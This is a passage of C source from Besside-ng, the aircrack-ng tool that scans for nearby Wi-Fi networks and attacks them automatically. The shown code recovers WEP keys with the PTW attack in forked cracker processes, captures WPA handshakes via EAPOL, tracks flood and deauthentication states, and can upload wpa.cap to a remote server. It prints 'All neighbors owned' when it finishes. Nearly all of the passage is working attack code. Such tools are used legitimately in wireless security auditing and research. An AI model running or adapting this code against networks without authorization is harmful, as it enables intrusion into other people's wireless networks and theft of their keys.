2269 ssize_t unused;
2270
2271 unsigned char key[PTW_KEYHSBYTES];
2272 int(*all)[256];
2273 int i, j;
2274
2275 all = xmalloc(256 * 32 * sizeof(int));
2276
2277 // initial setup (complete keyspace)
2278 for (i = 0; i < 32; i++)
2279 {
2280 for (j = 0; j < 256; j++) all[i][j] = 1;
2281 }
2282
2283 if (PTW_computeKey(n->n_ptw, key, len, limit, PTW_DEFAULTBF, all, 0) != 1)
2284 return;
2285
2286 unused = write(c->cr_pipe[1], key, len);
2287 }
2288
crack_wep64(struct cracker * c,struct network * n)2289 static void crack_wep64(struct cracker * c, struct network * n)
2290 {
2291 do_wep_crack(c, n, 5, KEYLIMIT / 10);
2292 }
2293
crack_wep128(struct cracker * c,struct network * n)2294 static void crack_wep128(struct cracker * c, struct network * n)
2295 {
2296 do_wep_crack(c, n, 13, KEYLIMIT);
2297 }
2298
cracker_start(struct cracker * c,cracker_cb cb,struct network * n)2299 static void cracker_start(struct cracker * c, cracker_cb cb, struct network * n)
2300 {
2301 if (pipe(c->cr_pipe) == -1) err(1, "pipe()");
2302
2303 c->cr_pid = fork();
2304 if (c->cr_pid == -1) err(1, "fork()");
2305
2306 if (c->cr_pid)
2307 {
2308 /* parent */
2309 close(c->cr_pipe[1]);
2310 }
2311 else
2312 {
2313 /* child */
2314 close(c->cr_pipe[0]);
2315 cb(c, n);
2316 exit(0);
2317 }
2318 }
2319
wep_crack_start(struct network * n)2320 static void wep_crack_start(struct network * n)
2321 {
2322 cracker_kill(&n->n_cracker_wep[0]);
2323 cracker_kill(&n->n_cracker_wep[1]);
2324
2325 cracker_start(&n->n_cracker_wep[0], crack_wep64, n);
2326 cracker_start(&n->n_cracker_wep[1], crack_wep128, n);
2327 }
2328
wep_crack(struct network * n)2329 static void wep_crack(struct network * n)
2330 {
2331 if (_state.s_state != STATE_ATTACK || _state.s_curnet != n
2332 || n->n_astate != ASTATE_WEP_FLOOD)
2333 {
2334 n->n_crack_next = n->n_data_count + 1;
2335 return;
2336 }
2337
2338 wep_crack_start(n);
2339
2340 n->n_crack_next += _conf.cf_crack_int;
2341 }
2342
ptw_add(struct network * n,struct ieee80211_frame * wh,unsigned char * body,int len)2343 static int ptw_add(struct network * n,
2344 struct ieee80211_frame * wh,
2345 unsigned char * body,
2346 int len)
2347 {
2348 unsigned char clear[2048];
2349 int dlen = len - 4 - 4;
2350 int clearsize;
2351 int i, weight[16], k, j;
2352 int rc = 0;
2353
2354 k = known_clear(clear, &clearsize, weight, (void *) wh, dlen);
2355 if (clearsize < 16) return rc;
2356
2357 for (j = 0; j < k; j++)
2358 {
2359 for (i = 0; i < clearsize; i++) clear[i + (32 * j)] ^= body[4 + i];
2360 }
2361
2362 if (!n->n_ptw)
2363 {
2364 n->n_ptw = PTW_newattackstate();
2365 if (!n->n_ptw) err(1, "PTW_newattackstate()");
2366 }
2367
2368 if (PTW_addsession(n->n_ptw, body, clear, weight, k))
2369 {
2370 speed_add(&n->n_flood_in);
2371 n->n_data_count++;
2372 rc = 1;
2373 }
2374
2375 if (n->n_data_count == n->n_crack_next) wep_crack(n);
2376
2377 return rc;
2378 }
2379
ptw_free(struct network * n)2380 static void ptw_free(struct network * n)
2381 {
2382 if (n->n_ptw)
2383 {
2384 PTW_freeattackstate(n->n_ptw);
2385 n->n_ptw = NULL;
2386 }
2387 }
2388
wifi_data(struct network * n,struct ieee80211_frame * wh,int len)2389 static void wifi_data(struct network * n, struct ieee80211_frame * wh, int len)
2390 {
2391 unsigned char * p = (unsigned char *) (wh + 1);
2392 struct llc * llc;
2393 int wep = wh->i_fc[1] & IEEE80211_FC1_WEP;
2394 int eapol = 0;
2395 struct client * c;
2396 int stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK;
2397 int orig = len;
2398
2399 assert(n);
2400
2401 len -= sizeof(*wh);
2402
2403 if (stype == IEEE80211_FC0_SUBTYPE_QOS)
2404 {
2405 p += 2;
2406 len -= 2;
2407 }
2408
2409 if (!wep && len >= 8)
2410 {
2411 llc = (struct llc *) p;
2412
2413 eapol = memcmp(llc, "\xaa\xaa\x03\x00\x00\x00\x88\x8e", 8) == 0;
2414
2415 p += 8;
2416 len -= 8;
2417 }
2418
2419 if (!wep && !eapol) return;
2420
2421 if (!n->n_have_beacon)
2422 {
2423 n->n_chan = _state.s_chan;
2424 n->n_crypto = eapol ? CRYPTO_WPA : CRYPTO_WEP;
2425
2426 /* XXX */
2427 if (n->n_crypto == CRYPTO_WEP && p[3] != 0) n->n_crypto = CRYPTO_WPA;
2428 }
2429
2430 if (eapol)
2431 {
2432 c = client_get(n, wh);
2433
2434 /* c can be null if using our MAC (e.g., VAPs) */
2435 if (c) process_eapol(n, c, p, len, wh, orig);
2436 return;
2437 }
2438
2439 if (n->n_crypto != CRYPTO_WEP)
2440 {
2441 ptw_free(n);
2442 return;
2443 }
2444
2445 if (len < (4 + 4)) return;
2446
2447 if (n->n_astate == ASTATE_DONE) return;
2448
2449 get_replayable(n, wh, p, len);
2450
2451 check_replay(n, wh, len);
2452
2453 if (ptw_add(n, wh, p, len))
2454 {
2455 if (n->n_have_beacon && !n->n_beacon_wrote)
2456 {
2457 packet_write_pcap(_state.s_wepfd, &n->n_beacon);
2458
2459 n->n_beacon_wrote = 1;
2460 }
2461
2462 write_pcap(_state.s_wepfd, wh, orig);
2463 }
2464 }
2465
network_update(struct ieee80211_frame * wh)2466 static struct network * network_update(struct ieee80211_frame * wh)
2467 {
2468 struct network * n;
2469 struct client * c = NULL;
2470 unsigned char * bssid;
2471 int fromnet;
2472
2473 bssid = get_bssid(wh);
2474 if (!bssid) return NULL;
2475
2476 n = network_get(wh);
2477 if (!n) n = network_add(wh);
2478
2479 assert(n);
2480
2481 if ((fromnet = (memcmp(wh->i_addr2, bssid, sizeof(wh->i_addr2)) == 0)))
2482 n->n_dbm = _state.s_ri->ri_power;
2483
2484 c = client_update(n, wh);
2485 if (c && !fromnet) c->c_dbm = _state.s_ri->ri_power;
2486
2487 return n;
2488 }
2489
wifi_read(void)2490 static void wifi_read(void)
2491 {
2492 struct state * s = &_state;
2493 unsigned char buf[2048];
2494 int rd;
2495 struct rx_info ri;
2496 struct ieee80211_frame * wh = (struct ieee80211_frame *) buf;
2497 struct network * n;
2498
2499 memset(buf, 0, sizeof(buf));
2500
2501 rd = wi_read(s->s_wi, buf, sizeof(buf), &ri);
2502 if (rd < 0) err(1, "wi_read()");
2503
2504 if (rd < (int) sizeof(struct ieee80211_frame))
2505 {
2506 return;
2507 }
2508
2509 s->s_ri = &ri;
2510
2511 n = network_update(wh);
2512
2513 switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK)
2514 {
2515 case IEEE80211_FC0_TYPE_MGT:
2516 wifi_mgt(n, wh, rd);
2517 break;
2518
2519 case IEEE80211_FC0_TYPE_CTL:
2520 wifi_ctl(wh, rd);
2521 break;
2522
2523 case IEEE80211_FC0_TYPE_DATA:
2524 wifi_data(n, wh, rd);
2525 break;
2526
2527 default:
2528 printf("Unknown type %d\n", wh->i_fc[0]);
2529 }
2530 }
2531
astate2str(int astate)2532 static const char * astate2str(int astate)
2533 {
2534 static char num[16];
2535 static char * states[] = {"NONE",
2536 "PING",
2537 "READY",
2538 "DEAUTH",
2539 "WPA_CRACK",
2540 "GET REPLAY",
2541 "FLOOD",
2542 "NONE",
2543 "DONE"};
2544
2545 if (astate >= (int) (sizeof(states) / sizeof(*states)))
2546 {
2547 snprintf(num, sizeof(num), "%d", astate);
2548 return num;
2549 }
2550
2551 return states[astate];
2552 }
2553
wstate2str(int astate)2554 static const char * wstate2str(int astate)
2555 {
2556 static char num[16];
2557 static char * states[] = {"NONE", "AUTH", "ASSOC"};
2558
2559 if (astate >= (int) (sizeof(states) / sizeof(*states)))
2560 {
2561 snprintf(num, sizeof(num), "%d", astate);
2562 return num;
2563 }
2564
2565 return states[astate];
2566 }
2567
print_status(int advance)2568 static void print_status(int advance)
2569 {
2570 static char status[] = "|/-|/-\\";
2571 static char * statusp = status;
2572 struct network * n = _state.s_curnet;
2573 struct client * c;
2574 int ccount = 0;
2575
2576 time_printf(V_NORMAL, "%c", *statusp);
2577
2578 switch (_state.s_state)
2579 {
2580 case STATE_SCAN:
2581 printf(" Scanning chan %.2d", _state.s_chan);
2582 break;
2583
2584 case STATE_ATTACK:
2585 printf(" Attacking [%s] %s - %s",
2586 n->n_ssid,
2587 n->n_crypto == CRYPTO_WPA ? "WPA" : "WEP",
2588 astate2str(n->n_astate));
2589
2590 if (need_connect(n) && n->n_wstate != WSTATE_ASSOC)
2591 printf(" [conn: %s]", wstate2str(n->n_wstate));
2592
2593 switch (n->n_astate)
2594 {
2595 case ASTATE_WEP_FLOOD:
2596 if (n->n_cracker_wep[0].cr_pid
2597 || n->n_cracker_wep[1].cr_pid)
2598 printf(" cracking");
2599
2600 speed_calculate(&n->n_flood_in);
2601 speed_calculate(&n->n_flood_out);
2602
2603 printf(" - %d IVs rate %u [%u PPS out] len %d",
2604 n->n_data_count,
2605 n->n_flood_in.s_speed,
2606 n->n_flood_out.s_speed,
2607 (int) (n->n_replay_len
2608 - sizeof(struct ieee80211_frame)
2609 - 4
2610 - 4));
2611 break;
2612
2613 case ASTATE_DEAUTH:
2614 c = n->n_clients.c_next;
2615 while (c)
2616 {
2617 ccount++;
2618
2619 c = c->c_next;
2620 }
2621
2622 if (ccount) printf(" (know %d clients)", ccount);
2623 break;
2624 }
2625
2626 break;
2627 }
2628
2629 printf("\r");
2630 fflush(stdout);
2631
2632 if (advance) statusp++;
2633
2634 if (statusp >= (&status[sizeof(status) - 1])) statusp = status;
2635 }
2636
make_progress(void)2637 static void make_progress(void)
2638 {
2639 if (_state.s_state == STATE_SCAN && _state.s_hopcycles > 2)
2640 {
2641 print_work();
2642 attack_next();
2643 _state.s_hopcycles = 0;
2644 }
2645 }
2646
cracker_check(struct network * n,struct cracker * c)2647 static void cracker_check(struct network * n, struct cracker * c)
2648 {
2649 unsigned char buf[1024];
2650 int rc;
2651
2652 rc = read(c->cr_pipe[0], buf, sizeof(buf));
2653 if (rc <= 0)
2654 {
2655 cracker_kill(c);
2656 return;
2657 }
2658
2659 assert(rc <= (int) sizeof(n->n_key));
2660
2661 memcpy(n->n_key, buf, rc);
2662 n->n_key_len = rc;
2663
2664 time_printf(V_NORMAL, "Got key for %s [", n->n_ssid);
2665 print_hex(n->n_key, n->n_key_len);
2666 printf("] %d IVs\n", n->n_data_count);
2667
2668 cracker_kill(&n->n_cracker_wep[0]);
2669 cracker_kill(&n->n_cracker_wep[1]);
2670
2671 n->n_astate = ASTATE_DONE;
2672 ptw_free(n);
2673 attack_continue(n);
2674 }
2675
add_cracker_fds(fd_set * fds,int max)2676 static int add_cracker_fds(fd_set * fds, int max)
2677 {
2678 struct network * n;
2679 int i;
2680
2681 if (_state.s_state != STATE_ATTACK) return max;
2682
2683 n = _state.s_curnet;
2684
2685 for (i = 0; i < 2; i++)
2686 {
2687 struct cracker * c = &n->n_cracker_wep[i];
2688
2689 if (c->cr_pipe[0])
2690 {
2691 FD_SET(c->cr_pipe[0], fds);
2692
2693 if (c->cr_pipe[0] > max) max = c->cr_pipe[0];
2694 }
2695 }
2696
2697 return max;
2698 }
2699
check_cracker_fds(fd_set * fds)2700 static void check_cracker_fds(fd_set * fds)
2701 {
2702 struct network * n;
2703 struct cracker * c;
2704 int i;
2705
2706 if (_state.s_state != STATE_ATTACK) return;
2707
2708 n = _state.s_curnet;
2709
2710 for (i = 0; i < 2; i++)
2711 {
2712 c = &n->n_cracker_wep[i];
2713
2714 if (c->cr_pipe[0] && FD_ISSET(c->cr_pipe[0], fds)) cracker_check(n, c);
2715 }
2716 }
2717
strip_spaces(char * p)2718 static char * strip_spaces(char * p)
2719 {
2720 char * x;
2721
2722 while (*p == ' ') p++;
2723
2724 x = p + strlen(p) - 1;
2725 while (x >= p && *x == ' ') *x-- = 0;
2726
2727 return p;
2728 }
2729
parse_hex(unsigned char * out,char * in,int l)2730 static int parse_hex(unsigned char * out, char * in, int l)
2731 {
2732 int len = 0;
2733
2734 while (in)
2735 {
2736 char * p = strchr(in, ':');
2737 int x;
2738
2739 if (--l < 0) err(1, "parse_hex len");
2740
2741 if (p) *p++ = 0;
2742
2743 if (sscanf(in, "%x", &x) != 1) errx(1, "parse_hex()");
2744
2745 *out++ = (unsigned char) x;
2746 len++;
2747
2748 in = p;
2749 }
2750
2751 return len;
2752 }
2753
resume_network(char * buf)2754 static void resume_network(char * buf)
2755 {
2756 char *p = buf, *p2;
2757 int state = 0;
2758 struct network * n;
2759
2760 if (buf[0] == '#') return;
2761
2762 n = network_new();
2763
2764 while (1)
2765 {
2766 p2 = strchr(p, '|');
2767
2768 if (!p2)
2769 {
2770 p2 = strchr(p, '\n');
2771 if (!p2) break;
2772 }
2773
2774 *p2++ = 0;
2775
2776 p = strip_spaces(p);
2777
2778 switch (state)
2779 {
2780 /* ssid */
2781 case 0:
2782 strncpy(n->n_ssid, p, sizeof(n->n_ssid));
2783 (n->n_ssid)[sizeof(n->n_ssid) - 1] = '\0';
2784 break;
2785
2786 /* key */
2787 case 1:
2788 if (strstr(p, "handshake"))
2789 {
2790 n->n_crypto = CRYPTO_WPA;
2791 n->n_client_handshake = (void *) 0xbad;
2792 }
2793 else if (strchr(p, ':'))
2794 {
2795 n->n_crypto = CRYPTO_WEP;
2796
2797 n->n_key_len = parse_hex(n->n_key, p, sizeof(n->n_key));
2798 }
2799
2800 if (n->n_crypto != CRYPTO_NONE)
2801 {
2802 n->n_have_beacon = 1;
2803 n->n_astate = ASTATE_DONE;
2804 }
2805 break;
2806
2807 /* bssid */
2808 case 2:
2809 parse_hex(n->n_bssid, p, sizeof(n->n_bssid));
2810 break;
2811
2812 case 3:
2813 if (*p)
2814 {
2815 struct client * c = xmalloc(sizeof(*c));
2816
2817 memset(c, 0, sizeof(*c));
2818
2819 parse_hex(c->c_mac, p, sizeof(c->c_mac));
2820
2821 n->n_client_mac = c;
2822 n->n_got_mac = 1;
2823 }
2824 break;
2825 }
2826
2827 state++;
2828 p = p2;
2829 }
2830
2831 if (n->n_astate != ASTATE_DONE)
2832 {
2833 free(n);
2834 return;
2835 }
2836
2837 do_network_add(n);
2838
2839 network_print(n);
2840 }
2841
resume(void)2842 static void resume(void)
2843 {
2844 FILE * f;
2845 char buf[4096];
2846
2847 f = fopen(_conf.cf_log, "r");
2848 if (!f) return;
2849
2850 time_printf(V_NORMAL, "Resuming from %s\n", _conf.cf_log);
2851
2852 while (fgets(buf, sizeof(buf), f)) resume_network(buf);
2853
2854 fclose(f);
2855 }
2856
cleanup(int UNUSED (x))2857 static void cleanup(int UNUSED(x))
2858 {
2859 struct state * s = &_state;
2860 struct network * n;
2861
2862 printf("\nDying...\n");
2863
2864 wi_close(s->s_wi);
2865
2866 if (_state.s_state == STATE_ATTACK)
2867 {
2868 n = _state.s_curnet;
2869 assert(n);
2870 cracker_kill(&n->n_cracker_wep[0]);
2871 cracker_kill(&n->n_cracker_wep[1]);
2872 }
2873
2874 if (_state.s_wpafd) close(_state.s_wpafd);
2875
2876 if (_state.s_wepfd) close(_state.s_wepfd);
2877
2878 print_work();
2879
2880 exit(0);
2881 }
2882
pwn(void)2883 static void pwn(void)
2884 {
2885 struct state * s = &_state;
2886 struct timeval tv;
2887 fd_set fds;
2888 int wifd, max, rc;
2889
2890 if (!(s->s_wi = wi_open(_conf.cf_ifname))) err(1, "wi_open()");
2891
2892 if (wi_get_mac(s->s_wi, _state.s_mac) == -1) err(1, "wi_get_mac()");
2893
2894 gettimeofday(&_state.s_now, NULL);
2895 memcpy(&_state.s_start, &_state.s_now, sizeof(_state.s_start));
2896
2897 wifd = wi_fd(s->s_wi);
2898 max = wifd;
2899
2900 time_printf(V_VERBOSE, "mac %s\n", mac2str(_state.s_mac));
2901 time_printf(V_NORMAL, "Let's ride\n");
2902
2903 if (wi_set_channel(s->s_wi, _state.s_chan) == -1)
2904 err(1, "wi_set_channel()");
2905
2906 resume();
2907
2908 _state.s_wpafd = open_pcap(_conf.cf_wpa);
2909 _state.s_wepfd = open_pcap(_conf.cf_wep);
2910
2911 save_log();
2912 time_printf(V_NORMAL, "Logging to %s\n", _conf.cf_log);
2913
2914 scan_start();
2915
2916 while (s->s_state != STATE_DONE)
2917 {
2918 timer_next(&tv);
2919
2920 FD_ZERO(&fds);
2921 FD_SET(wifd, &fds);
2922
2923 max = add_cracker_fds(&fds, max);
2924
2925 if ((rc = select(max + 1, &fds, NULL, NULL, &tv)) == -1
2926 && errno != EINTR)
2927 err(1, "select()");
2928
2929 gettimeofday(&_state.s_now, NULL);
2930
2931 check_cracker_fds(&fds);
2932
2933 print_status(FD_ISSET(wifd, &fds));
2934
2935 if (FD_ISSET(wifd, &fds)) wifi_read();
2936
2937 timer_check();
2938
2939 make_progress();
2940 }
2941
2942 time_printf(V_NORMAL, "All neighbors owned\n");
2943
2944 cleanup(0);
2945 }
2946
channel_add(int num)2947 static void channel_add(int num)
2948 {
2949 struct channel * c = xmalloc(sizeof(*c));
2950 struct channel * pos = _conf.cf_channels.c_next;
2951
2952 while (pos->c_next != _conf.cf_channels.c_next) pos = pos->c_next;
2953
2954 memset(c, 0, sizeof(*c));
2955
2956 pos->c_next = c;
2957
2958 c->c_num = num;
2959 c->c_next = _conf.cf_channels.c_next;
2960 }
2961
init_conf(void)2962 static void init_conf(void)
2963 {
2964 int i;
2965
2966 _conf.cf_channels.c_next = &_conf.cf_channels;
2967
2968 for (i = 1; i <= 11; i++) channel_add(i);
2969
2970 _state.s_hopchan = _conf.cf_channels.c_next;
2971
2972 _conf.cf_hopfreq = 250;
2973 _conf.cf_deauthfreq = 2500;
2974 _conf.cf_attackwait = 10;
2975 _conf.cf_floodwait = 60;
2976 _conf.cf_to = 100;
2977 _conf.cf_floodfreq = 10 * 1000;
2978 _conf.cf_crack_int = 5000;
2979 _conf.cf_wpa = "wpa.cap";
2980 _conf.cf_wep = "wep.cap";
2981 _conf.cf_log = "besside.log";
2982 _conf.cf_do_wep = 1;
2983 _conf.cf_do_wpa = 1;
2984 }
2985
timer_cb2str(timer_cb cb)2986 static const char * timer_cb2str(timer_cb cb)
2987 {
2988 if (cb == hop)
2989 return "hop";
2990 else if (cb == attack_watchdog)
2991 return "attack_watchdog";
2992 else if (cb == deauth)
2993 return "deauth";
2994 else
2995 return "UNKNOWN";
2996 }
2997
print_state_network(struct network * n)2998 static void print_state_network(struct network * n)
2999 {
3000 struct client * c = n->n_clients.c_next;
3001
3002 printf("Network: [%s] chan %d bssid %s astate %d dbm %d"
3003 " have_beacon %d crypto %d",
3004 n->n_ssid,
3005 n->n_chan,
3006 mac2str(n->n_bssid),
3007 n->n_astate,
3008 n->n_dbm,
3009 n->n_have_beacon,
3010 n->n_crypto);
3011
3012 if (n->n_key_len)
3013 {
3014 printf(" KEY [");
3015 print_hex(n->n_key, n->n_key_len);
3016 printf("]");
3017 }
3018
3019 printf("\n");
3020
3021 while (c)
3022 {
3023 printf("\tClient: %s wpa_got %d dbm %d\n",
3024 mac2str(c->c_mac),
3025 c->c_wpa_got,
3026 c->c_dbm);
3027
3028 c = c->c_next;
3029 }
3030 }
3031
print_state(int UNUSED (x))3032 static void print_state(int UNUSED(x))
3033 {
3034 struct state * s = &_state;
3035 struct network * n = s->s_curnet;
3036 struct channel * c = s->s_hopchan;
3037 struct channel * c2 = c;
3038 struct timer * t = s->s_timers.t_next;
3039
3040 printf("\n=============== Internal state ============\n");
3041 printf("State:\t%d\n", s->s_state);
3042
3043 if (s->s_state == STATE_ATTACK)
3044 {
3045 printf("Current attack network: [%s] %s\n",
3046 n->n_ssid,
3047 mac2str(n->n_bssid));
3048 }
3049
3050 n = _state.s_networks.n_next;
3051 while (n)
3052 {
3053 print_state_network(n);
3054 n = n->n_next;
3055 }
3056
3057 printf("Current chan: %d\n", s->s_chan);
3058 printf("Hop cycle %u chans:", s->s_hopcycles);
3059 do
3060 {
3061 printf(" %d", c->c_num);
3062 c = c->c_next;
3063
3064 if (c != c2) printf(",");
3065
3066 } while (c != c2);
3067 printf("\n");
3068
3069 printf(
3070 #if !defined(__APPLE_CC__) && !defined(__NetBSD__) && !defined(__OpenBSD__)
3071 "Now: %lu.%lu\n",
3072 #else
3073 "Now: %lu.%d\n",
3074 #endif
3075 s->s_now.tv_sec,
3076 s->s_now.tv_usec);
3077
3078 while (t)
3079 {
3080 printf(
3081 #if !defined(__APPLE_CC__) && !defined(__NetBSD__) && !defined(__OpenBSD__)
3082 "Timer: %lu.%lu %p[%s](%p)\n",
3083 #else
3084 "Timer: %lu.%d %p[%s](%p)\n",
3085 #endif
3086 t->t_tv.tv_sec,
3087 t->t_tv.tv_usec,
3088 t->t_cb,
3089 timer_cb2str(t->t_cb),
3090 t->t_arg);
3091
3092 t = t->t_next;
3093 }
3094
3095 print_work();
3096
3097 printf("===========================================\n");
3098 }
3099
usage(char * prog)3100 static void usage(char * prog)
3101 {
3102 char * version_info
3103 = getVersion("Besside-ng", _MAJ, _MIN, _SUB_MIN, _REVISION, _BETA, _RC);
3104 printf("\n"
3105 " %s - (C) 2010 Andrea Bittau\n"
3106 " https://www.aircrack-ng.org\n"
3107 "\n"
3108 " Usage: %s [options] <interface>\n"
3109 "\n"
3110 " Options:\n"
3111 "\n"
3112 " -b <victim mac> : Victim BSSID\n"
3113 #ifdef HAVE_PCRE
3114 " -R <victim ap regex> : Victim ESSID regex\n"
3115 #endif
3116 " -s <WPA server> : Upload wpa.cap for cracking\n"
3117 " -c <chan> : chanlock\n"
3118 " -p <pps> : flood rate\n"
3119 " -W : WPA only\n"
3120 " -v : verbose, -vv for more, etc.\n"
3121 " -h : This help screen\n"
3122 "\n",
3123 version_info,
3124 prog);
3125 free(version_info);
3126 exit(1);
3127 }
3128
main(int argc,char * argv[])3129 int main(int argc, char * argv[])
3130 {
3131 int ch, temp;
3132 #ifdef HAVE_PCRE
3133 const char * pcreerror;
3134 int pcreerroffset;
3135 #endif
3136
3137 init_conf();
3138
3139 while ((ch = getopt(argc, argv, "hb:vWs:c:p:R:")) != -1)
3140 {
3141 switch (ch)
3142 {
3143 case 's':
3144 _conf.cf_wpa_server = optarg;
3145 break;
3146
3147 case 'W':
3148 _conf.cf_do_wep = 0;
3149 break;
3150
3151 case 'p':
3152 temp = atoi(optarg);
3153 if (temp <= 0)
3154 {
3155 printf("Invalid flood rate value, must be > 0");
3156 exit(1);
3157 }
3158 _conf.cf_floodfreq
3159 = (int) (1.0 / (double) temp * 1000.0 * 1000.0);
3160 break;
3161
3162 case 'c':
3163 // XXX leak
3164 _conf.cf_channels.c_next = &_conf.cf_channels;
3165 temp = atoi(optarg);
3166 if (temp <= 0)
3167 {
3168 printf("Invalid channel, must be > 0\n");
3169 exit(1);
3170 }
3171 channel_add(temp);
3172 _state.s_hopchan = _conf.cf_channels.c_next;
3173 break;
3174
3175 case 'v':
3176 _conf.cf_verb++;
3177 break;
3178
3179 case 'b':
3180 _conf.cf_bssid = xmalloc(6);
3181 parse_hex(_conf.cf_bssid, optarg, 6);
3182 break;
3183
3184 #ifdef HAVE_PCRE
3185 case 'R':
3186 if (_conf.cf_essid_regex != NULL)
3187 {
3188 printf("Error: ESSID regular expression already given. "
3189 "Aborting\n");
3190 exit(1);
3191 }
3192
3193 _conf.cf_essid_regex
3194 = pcre_compile(optarg, 0, &pcreerror, &pcreerroffset, NULL);
3195
3196 if (_conf.cf_essid_regex == NULL)
3197 {
3198 printf("Error: regular expression compilation failed at "
3199 "offset %d: %s; aborting\n",
3200 pcreerroffset,
3201 pcreerror);
3202 exit(1);
3203 }
3204 break;
3205 #endif
3206
3207 default:
3208 case 'h':
3209 usage(argv[0]);
3210 break;
3211 }
3212 }
3213
3214 if (optind <= argc) _conf.cf_ifname = argv[optind];
3215
3216 if (!_conf.cf_ifname)
3217 {
3218 printf("Gimme an interface name dude\n");
3219 usage(argv[0]);
3220 }
3221
3222 signal(SIGINT, cleanup);
3223 signal(SIGKILL, cleanup);
3224 signal(SIGUSR1, print_state);
3225 signal(SIGCHLD, do_wait);
3226
3227 pwn();
3228
3229 #ifdef HAVE_PCRE
3230 if (_conf.cf_essid_regex) pcre_free(_conf.cf_essid_regex);
3231 #endif
3232
3233 exit(0);
3234 }
3235